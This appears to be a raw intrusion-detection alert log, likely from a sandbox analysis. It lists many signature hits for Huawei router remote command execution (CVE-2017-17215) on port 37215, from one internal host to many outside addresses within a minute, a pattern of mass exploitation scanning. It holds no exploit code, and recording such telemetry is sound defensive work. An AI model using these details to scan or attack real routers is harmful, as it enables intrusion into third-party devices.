                                                    07/10/24-08:26:13.647061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3992437215192.168.2.1441.165.59.61
                                                    07/10/24-08:26:57.516080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4693237215192.168.2.14157.11.142.229
                                                    07/10/24-08:26:17.939725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5936637215192.168.2.1441.151.78.77
                                                    07/10/24-08:26:52.079207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690237215192.168.2.14197.41.140.58
                                                    07/10/24-08:26:43.624566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445237215192.168.2.14157.222.110.32
                                                    07/10/24-08:27:30.423291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829637215192.168.2.1441.168.75.192
                                                    07/10/24-08:26:41.560795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4548637215192.168.2.1441.248.102.72
                                                    07/10/24-08:26:11.514998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5858837215192.168.2.14186.184.213.120
                                                    07/10/24-08:26:26.588123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4205837215192.168.2.14197.231.54.94
                                                    07/10/24-08:26:28.795318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3632637215192.168.2.1441.236.78.85
                                                    07/10/24-08:27:32.587854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056237215192.168.2.14197.227.181.191
                                                    07/10/24-08:26:38.641903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4787037215192.168.2.14157.169.255.247
                                                    07/10/24-08:26:20.140373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4359037215192.168.2.14197.29.91.154
                                                    07/10/24-08:27:05.094714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5675037215192.168.2.14149.92.168.248
                                                    07/10/24-08:26:43.529694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4512637215192.168.2.1441.241.152.147
                                                    07/10/24-08:26:18.012048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5850637215192.168.2.1441.99.22.121
                                                    07/10/24-08:27:19.198871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496237215192.168.2.14205.1.34.61
                                                    07/10/24-08:27:17.022999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481437215192.168.2.14157.162.199.1
                                                    07/10/24-08:27:22.891775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4200437215192.168.2.14157.235.10.59
                                                    07/10/24-08:26:53.154328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4970237215192.168.2.14162.185.212.16
                                                    07/10/24-08:27:10.672315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3787837215192.168.2.14177.223.228.60
                                                    07/10/24-08:26:51.997172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5977037215192.168.2.1441.167.42.247
                                                    07/10/24-08:27:08.446454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4824837215192.168.2.1441.172.226.80
                                                    07/10/24-08:26:22.259501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428637215192.168.2.14197.64.1.77
                                                    07/10/24-08:27:24.927319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5653437215192.168.2.14197.140.73.163
                                                    07/10/24-08:26:59.861773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5502037215192.168.2.14197.226.232.204
                                                    07/10/24-08:26:28.777569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5217037215192.168.2.14157.117.35.153
                                                    07/10/24-08:26:25.499422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881237215192.168.2.1482.23.203.249
                                                    07/10/24-08:26:43.931140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3581237215192.168.2.14197.93.101.251
                                                    07/10/24-08:26:59.644230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5054037215192.168.2.14197.9.144.99
                                                    07/10/24-08:26:13.645401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4814637215192.168.2.14157.164.16.157
                                                    07/10/24-08:26:22.295095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491037215192.168.2.1441.99.153.94
                                                    07/10/24-08:26:29.864759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3741237215192.168.2.1475.244.56.200
                                                    07/10/24-08:27:23.824127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357837215192.168.2.1441.145.167.37
                                                    07/10/24-08:26:17.941033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4546837215192.168.2.14157.155.36.5
                                                    07/10/24-08:27:23.944748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5870237215192.168.2.14197.72.250.87
                                                    07/10/24-08:26:33.217883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5273437215192.168.2.1441.18.85.202
                                                    07/10/24-08:26:47.774106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5215637215192.168.2.1472.4.207.202
                                                    07/10/24-08:27:33.882743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4305237215192.168.2.14192.219.249.226
                                                    07/10/24-08:26:14.657755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3666637215192.168.2.1442.81.26.219
                                                    07/10/24-08:27:08.339204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3936637215192.168.2.1441.209.71.75
                                                    07/10/24-08:26:36.437986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4526837215192.168.2.14153.161.239.3
                                                    07/10/24-08:26:41.528499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695237215192.168.2.14157.242.136.198
                                                    07/10/24-08:26:11.583979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4895437215192.168.2.1441.162.114.191
                                                    07/10/24-08:27:05.230941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4825037215192.168.2.14157.67.11.95
                                                    07/10/24-08:26:59.856885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037237215192.168.2.14197.93.86.75
                                                    07/10/24-08:26:55.438982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5096637215192.168.2.1441.195.11.46
                                                    07/10/24-08:26:43.798286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4936037215192.168.2.1441.221.13.152
                                                    07/10/24-08:26:25.430208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740837215192.168.2.1473.104.119.73
                                                    07/10/24-08:26:49.867882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5161437215192.168.2.1441.25.178.81
                                                    07/10/24-08:26:17.999719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6041437215192.168.2.14197.140.64.115
                                                    07/10/24-08:26:25.418572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924637215192.168.2.1441.65.135.172
                                                    07/10/24-08:26:38.603168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4492837215192.168.2.1473.241.5.134
                                                    07/10/24-08:26:28.712584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4265237215192.168.2.1442.120.138.228
                                                    07/10/24-08:27:23.895746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3686437215192.168.2.14123.33.215.237
                                                    07/10/24-08:26:14.777046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5756437215192.168.2.14167.229.202.68
                                                    07/10/24-08:26:38.549975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3339437215192.168.2.14157.164.223.60
                                                    07/10/24-08:26:41.395055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967037215192.168.2.1431.204.91.39
                                                    07/10/24-08:26:15.868570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5833837215192.168.2.1441.128.83.93
                                                    07/10/24-08:27:08.278598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5932037215192.168.2.14157.120.143.60
                                                    07/10/24-08:26:29.784523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5558637215192.168.2.14197.100.60.197
                                                    07/10/24-08:26:25.460773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5162637215192.168.2.14197.166.70.173
                                                    07/10/24-08:26:20.116732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4856037215192.168.2.14124.177.200.101
                                                    07/10/24-08:26:29.881583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4929037215192.168.2.14197.81.87.250
                                                    07/10/24-08:26:43.780155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5326037215192.168.2.14197.163.209.254
                                                    07/10/24-08:26:17.952819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077837215192.168.2.1441.149.255.220
                                                    07/10/24-08:27:27.130427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5430237215192.168.2.14197.220.177.135
                                                    07/10/24-08:26:36.383981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485037215192.168.2.14152.35.148.209
                                                    07/10/24-08:27:34.120553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3347837215192.168.2.14124.218.109.145
                                                    07/10/24-08:27:02.880964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5097437215192.168.2.14168.147.152.245
                                                    07/10/24-08:26:34.234468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5492837215192.168.2.14157.41.75.31
                                                    07/10/24-08:26:25.481864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3882237215192.168.2.14157.193.1.42
                                                    07/10/24-08:27:13.872698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4856437215192.168.2.1477.180.245.98
                                                    07/10/24-08:26:52.004457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4230037215192.168.2.14158.159.218.138
                                                    07/10/24-08:27:31.442738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3319637215192.168.2.14197.178.80.135
                                                    07/10/24-08:27:19.324318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4529637215192.168.2.14157.177.165.158
                                                    07/10/24-08:26:42.419943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4441237215192.168.2.1441.121.163.10
                                                    07/10/24-08:26:36.436089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4875437215192.168.2.1441.131.138.215
                                                    07/10/24-08:26:43.695962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5715637215192.168.2.1441.4.145.109
                                                    07/10/24-08:27:24.906290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4100437215192.168.2.1441.26.45.215
                                                    07/10/24-08:26:22.207243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4568837215192.168.2.14157.192.255.78
                                                    07/10/24-08:27:10.605633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4939837215192.168.2.1495.155.67.79
                                                    07/10/24-08:27:27.065687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5592437215192.168.2.14170.35.237.9
                                                    07/10/24-08:26:14.787511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4487437215192.168.2.14157.41.201.162
                                                    07/10/24-08:26:41.490874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731437215192.168.2.14157.251.124.134
                                                    07/10/24-08:27:02.730689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3464237215192.168.2.14197.223.60.237
                                                    07/10/24-08:26:43.527873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5451437215192.168.2.14157.37.227.59
                                                    07/10/24-08:27:23.782637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3340637215192.168.2.14157.253.108.212
                                                    07/10/24-08:26:55.442446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177837215192.168.2.14205.136.24.105
                                                    07/10/24-08:26:55.442575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4219237215192.168.2.1442.91.134.98
                                                    07/10/24-08:26:53.127595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717037215192.168.2.14157.96.114.235
                                                    07/10/24-08:26:43.833874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4526037215192.168.2.1441.65.142.118
                                                    07/10/24-08:27:02.972895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268637215192.168.2.14157.140.206.2
                                                    07/10/24-08:27:17.044881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171437215192.168.2.1441.144.179.158
                                                    07/10/24-08:26:33.217232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4044037215192.168.2.14157.64.140.189
                                                    07/10/24-08:27:30.560872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3447837215192.168.2.1420.112.24.158
                                                    07/10/24-08:27:22.861030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4043437215192.168.2.14223.185.249.107
                                                    07/10/24-08:26:59.686618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4847637215192.168.2.14157.246.147.226
                                                    07/10/24-08:27:05.156196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5159837215192.168.2.14197.171.190.42
                                                    07/10/24-08:27:28.088837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4297037215192.168.2.14197.200.84.31
                                                    07/10/24-08:26:28.919298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5667437215192.168.2.14157.228.254.114
                                                    07/10/24-08:26:36.433898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5318237215192.168.2.14197.33.2.105
                                                    07/10/24-08:27:22.890637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295637215192.168.2.1441.126.38.27
                                                    07/10/24-08:26:59.701278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3866837215192.168.2.14178.18.102.126
                                                    07/10/24-08:27:24.942131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4347237215192.168.2.14197.20.20.178
                                                    07/10/24-08:27:05.121517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4327637215192.168.2.14157.192.249.123
                                                    07/10/24-08:27:13.991583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729437215192.168.2.1441.19.13.33
                                                    07/10/24-08:27:30.464786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4997437215192.168.2.14157.168.67.197
                                                    07/10/24-08:27:05.083830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432037215192.168.2.14157.86.214.140
                                                    07/10/24-08:26:55.429155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729837215192.168.2.14152.34.48.100
                                                    07/10/24-08:26:52.088542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985437215192.168.2.14197.207.48.246
                                                    07/10/24-08:27:07.371632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3698637215192.168.2.14157.233.14.37
                                                    07/10/24-08:27:31.573908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3855837215192.168.2.1457.125.195.254
                                                    07/10/24-08:27:10.775914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574237215192.168.2.14158.24.55.210
                                                    07/10/24-08:26:38.616347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5669837215192.168.2.14157.141.48.60
                                                    07/10/24-08:26:49.834879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390237215192.168.2.1453.142.239.45
                                                    07/10/24-08:26:33.175364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4729237215192.168.2.14157.208.22.99
                                                    07/10/24-08:26:25.516790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359637215192.168.2.14157.157.63.57
                                                    07/10/24-08:26:38.520024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575237215192.168.2.14166.155.221.55
                                                    07/10/24-08:27:14.828457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4733037215192.168.2.1489.75.144.89
                                                    07/10/24-08:26:14.732567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4816837215192.168.2.14151.244.197.226
                                                    07/10/24-08:27:10.599679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501837215192.168.2.14197.43.161.81
                                                    07/10/24-08:26:26.600154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4393837215192.168.2.1441.42.118.66
                                                    07/10/24-08:26:52.034591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4828037215192.168.2.14157.95.202.221
                                                    07/10/24-08:27:24.946656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4930637215192.168.2.14157.238.27.248
                                                    07/10/24-08:27:19.226208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3352037215192.168.2.14192.153.42.195
                                                    07/10/24-08:27:22.849786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5196637215192.168.2.14157.240.153.211
                                                    07/10/24-08:27:17.102138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6016437215192.168.2.14202.131.177.231
                                                    07/10/24-08:26:29.861363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5424237215192.168.2.14157.109.230.7
                                                    07/10/24-08:27:10.666062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4323837215192.168.2.14157.69.163.63
                                                    07/10/24-08:27:27.171053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4843637215192.168.2.14157.202.235.3
                                                    07/10/24-08:27:32.617862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4894037215192.168.2.14197.18.127.113
                                                    07/10/24-08:26:11.575956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3829237215192.168.2.14197.225.165.212
                                                    07/10/24-08:26:47.980953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3891237215192.168.2.14197.91.35.51
                                                    07/10/24-08:27:10.699441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6046037215192.168.2.14165.181.126.75
                                                    07/10/24-08:26:59.661983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4649237215192.168.2.1497.129.100.136
                                                    07/10/24-08:26:28.834165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6041837215192.168.2.14157.229.172.152
                                                    07/10/24-08:27:00.596679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396437215192.168.2.14197.99.105.63
                                                    07/10/24-08:27:28.139662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4877637215192.168.2.14197.187.144.112
                                                    07/10/24-08:27:32.561309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5887837215192.168.2.1441.232.57.136
                                                    07/10/24-08:26:31.063898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3895037215192.168.2.1418.195.228.41
                                                    07/10/24-08:27:31.562174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710837215192.168.2.14197.188.37.37
                                                    07/10/24-08:27:32.545025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442237215192.168.2.14197.235.7.104
                                                    07/10/24-08:26:33.247887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654437215192.168.2.14124.8.79.98
                                                    07/10/24-08:26:18.016670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4991637215192.168.2.1441.108.169.133
                                                    07/10/24-08:27:05.121816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6091837215192.168.2.1427.62.19.197
                                                    07/10/24-08:26:43.885444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772437215192.168.2.14157.11.60.145
                                                    07/10/24-08:27:33.894424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5700037215192.168.2.14207.77.227.97
                                                    07/10/24-08:26:28.758809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682037215192.168.2.14197.37.89.209
                                                    07/10/24-08:26:28.893225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5759837215192.168.2.14157.67.61.82
                                                    07/10/24-08:26:38.621748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125237215192.168.2.14157.146.16.181
                                                    07/10/24-08:27:19.276422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958237215192.168.2.1452.174.206.170
                                                    07/10/24-08:26:28.741388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5663637215192.168.2.1441.196.245.116
                                                    07/10/24-08:27:14.017710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3937637215192.168.2.14157.246.158.44
                                                    07/10/24-08:26:45.609281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692237215192.168.2.14157.247.158.210
                                                    07/10/24-08:27:34.127270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345637215192.168.2.14125.150.217.180
                                                    07/10/24-08:26:18.016670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3416837215192.168.2.14157.61.126.77
                                                    07/10/24-08:27:13.993743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4859637215192.168.2.1436.100.82.197
                                                    07/10/24-08:26:52.048430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3763437215192.168.2.1468.249.160.138
                                                    07/10/24-08:26:36.368496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4662437215192.168.2.14157.250.249.115
                                                    07/10/24-08:26:49.762632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5189637215192.168.2.1441.142.150.47
                                                    07/10/24-08:26:11.088418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4808637215192.168.2.1441.117.164.47
                                                    07/10/24-08:27:23.938620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517037215192.168.2.14197.81.11.83
                                                    07/10/24-08:26:55.322018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4670837215192.168.2.14157.31.38.55
                                                    07/10/24-08:26:45.624284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523237215192.168.2.14157.238.127.102
                                                    07/10/24-08:26:14.623309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5591237215192.168.2.14197.12.236.158
                                                    07/10/24-08:26:22.290741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4490037215192.168.2.14197.5.241.113
                                                    07/10/24-08:26:18.015833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5607037215192.168.2.14197.151.228.196
                                                    07/10/24-08:27:05.111277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5433837215192.168.2.14197.98.185.168
                                                    07/10/24-08:27:07.389175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324237215192.168.2.1479.249.136.113
                                                    07/10/24-08:27:10.561451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4300637215192.168.2.1441.47.189.24
                                                    07/10/24-08:26:52.064971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6092237215192.168.2.1441.245.236.203
                                                    07/10/24-08:27:23.452507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5870837215192.168.2.14103.119.148.78
                                                    07/10/24-08:26:34.242902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965837215192.168.2.14114.168.187.255
                                                    07/10/24-08:27:17.005149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4329637215192.168.2.14157.106.230.182
                                                    07/10/24-08:27:10.648060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4759437215192.168.2.1441.14.95.188
                                                    07/10/24-08:26:36.427359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499837215192.168.2.14197.217.239.105
                                                    07/10/24-08:27:14.844780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5308037215192.168.2.14157.35.157.93
                                                    07/10/24-08:26:17.958835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527837215192.168.2.1482.38.152.143
                                                    07/10/24-08:27:28.082324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4530837215192.168.2.1479.38.190.190
                                                    07/10/24-08:26:53.145765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797637215192.168.2.14197.112.218.101
                                                    07/10/24-08:27:10.631591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3678837215192.168.2.14100.169.223.233
                                                    07/10/24-08:26:20.170023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478237215192.168.2.1441.177.30.143
                                                    07/10/24-08:27:32.602329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5097637215192.168.2.14133.240.49.33
                                                    07/10/24-08:26:18.014654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4656837215192.168.2.1441.198.21.93
